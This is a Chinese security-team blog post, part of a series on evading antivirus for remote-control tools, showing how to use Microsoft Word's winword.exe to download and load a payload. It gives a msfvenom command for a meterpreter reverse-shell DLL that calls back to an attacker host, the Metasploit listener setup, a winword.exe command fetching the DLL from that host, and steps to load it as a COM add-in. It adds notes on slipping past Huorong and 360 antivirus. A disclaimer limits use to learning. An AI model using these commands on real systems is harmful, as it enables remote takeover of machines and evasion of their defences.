远控免杀专题(50)-白名单winword.exe执行payload
2022-7-13 08:28:7 Author: 白帽子(查看原文) 阅读量:10 收藏

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus

winword.exe是微软Microsoft Word的主程序。该字处理程序是微软Microsoft Office组件的一部分。

msfvenom生成木马:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 -f dll > /var/www/html/shell.dll

设置监听:

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.19.146set lport 23333exploit

winword.exe下载payload:

winword.exe "http://192.168.19.146/shell.dll"

在未开启杀毒软件的情况下,winword.exe未对远程文件做校验直接下载到本地,下载的文件位置:

C:\Users\username\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

在开启杀毒软件的情况下执行该下载命令时会被拦截,下载的dll文件也会被删除:

winword.exe客户端会以只读的形式乱码显示文件内容:

通过winword.exe加载dll文件,步骤如下:

文件-->选项-->添加com加载项-->到下载的dll文件位置添加dll文件

添加成功后顺利建立会话:

当火绒和360处于开启的情况下,添加木马dll会报警,但会话依旧会建立:

  1. 使用msfvenom生成的木马在下载时就会被查杀,建议使用免杀效果更好的工具生成木马。

  2. winword.exe在加载木马时调用rundll32.exe程序,所以只能使用32位dll。

  3. 下载的木马文件即使关闭office程序后也不会被删除。

  4. vt免杀结果感人:

lolbas-winword:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/

通过微软office下载和执行payload:https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

E

N

D

guān

zhù

men

Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246174&idx=2&sn=99d0c589cb7d1e041b5b03437c9621de&chksm=82ea57b7b59ddea1f30a359ab67e9876b88518948b26b9d34a8d68e05942bec20ae7f71ceea2#rd
如有侵权请联系:admin#unsafe.sh